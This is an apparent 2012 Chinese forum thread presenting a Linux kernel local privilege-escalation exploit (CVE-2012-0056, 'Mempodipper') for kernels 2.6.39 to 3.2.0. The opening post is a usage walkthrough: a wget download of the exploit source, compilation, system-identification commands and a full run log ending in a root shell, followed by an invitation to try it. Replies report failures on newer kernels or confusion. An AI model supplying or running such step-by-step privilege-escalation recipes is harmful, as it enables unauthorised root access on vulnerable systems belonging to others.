Linux 2.6.39 到 3.2.0 爆提权漏洞

master · 发表于 2012-3-8 18:41:26

1.下载漏洞利用文件

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行
netcat@netcat:~$ ./mempodipper
===============================
=       Mempodipper       =
=          by zx2c4       =
=       Jan 21, 2012       =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
sh-4.2#

效果自测！

mj_japen · 发表于 2012-3-8 18:42:53

本帖最后由 mj_japen 于 2012-3-8 18:43 编辑

各种平台本地提权就一直没断过

副站长 · 发表于 2012-3-8 18:42:56

详细说一说啊，看不懂的

qxwo · 发表于 2012-3-8 18:43:38

什么玩意,用一件包的人表示看不懂

windywinter · 发表于 2012-3-8 19:07:46

debian testing
kernel 3.1.0失败

lxfy · 发表于 2012-3-8 20:22:04

arch
3.2.8 失败……是必然的

只看该作者 · 发表于 2012-3-8 20:24:10

提示: 作者被禁止或删除内容自动屏蔽

HuPo · 发表于 2012-3-8 20:27:31

ivv · 发表于 2012-3-8 20:31:23

玩不懂。

		自动登录	找回密码
密码			注册

suzizi 该用户已被删除	8^# 发表于 2012-3-8 20:24:10 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
suzizi 该用户已被删除
	回复支持反对举报

[疑问] Linux 2.6.39 到 3.2.0 爆提权漏洞

相关帖子

浏览过的版块